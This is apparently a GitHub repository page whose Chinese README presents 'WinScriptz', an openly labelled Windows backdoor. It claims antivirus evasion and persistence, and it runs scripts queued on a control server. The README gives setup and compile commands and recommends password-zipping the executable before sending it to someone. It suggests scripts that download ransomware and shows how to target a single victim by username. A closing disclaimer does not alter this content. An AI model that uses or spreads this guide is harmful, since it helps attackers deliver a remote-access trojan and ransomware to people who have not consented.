orkkz/WinScriptz

GitHub: orkkz/WinScriptz

一款开源 Windows 后门工具,通过管理服务器向远程计算机分发并执行自定义脚本,具备免杀和持久化能力。

Stars: 6 | Forks: 0

WinScriptz: An open-source Windows backdoor enabling remote script execution.

## 功能 - **免杀执行** – 使用规避技术绕过杀毒软件检测。 - **持久化** – 确保即使在系统重启后也能保持访问权限。 - **远程执行** – 从集中管理服务器下载并运行脚本。 - **自定义脚本** – 支持预制和用户自定义脚本,用于执行命令、禁用外设等。 WinScriptz 的工作原理是连接到管理服务器,检索排队的脚本,并在远程机器上执行它们。你可以使用 `queue-scripts` 工具远程管理和部署脚本。 **注意:** 在执行之前,请确保所有必需的库都已导入到 `executor.py` 中。 # 安装说明 安装 Python 依赖项 ``` python -m pip install -r requirements.txt ``` 启动服务器 ``` python app.py ``` 现在,编译该文件。 ``` python compile.py ``` # 使用说明 编译后的可执行文件可以在 `dist` 目录中找到,我建议在发送给某人之前使用密码对其进行压缩。 一旦有人运行了你的可执行文件,你将开始看到大量向你的服务器发送的请求,然后你可以运行 ``` python queue-scripts.py ``` 要为远程计算机排队脚本,你可以创建自己的脚本来执行各种任务,例如下载勒索软件或禁用 Windows 功能。 **注意**:必须在服务器计算机上运行 queue-scripts.py 才能排队脚本。 **提示**:要在单台计算机上排队脚本,你可以将该脚本放入以下代码块中。 ``` import os if 'JohnKennedy' == os.getlogin(): # Script code here ``` 'JohnKennedy' 是用户名,可以在 `replies` 目录中找到。 # 免责声明 本软件**仅供合规使用**,且仅应在获得所有者**明确授权**的系统上部署。未经同意对远程系统进行未经授权的访问、执行或修改是**违法的**,并可能违反多个司法管辖区的**网络犯罪法**。 对于因使用此工具而产生的任何滥用、损害或法律后果,我**不**承担任何责任。**使用风险自负**,并在部署之前确保你已获得适当的权限。
标签:DNS 反向解析, Python, 后门, 嗅探欺骗, 无后门, 权限维持, 网络信息收集, 远程访问木马, 逆向工具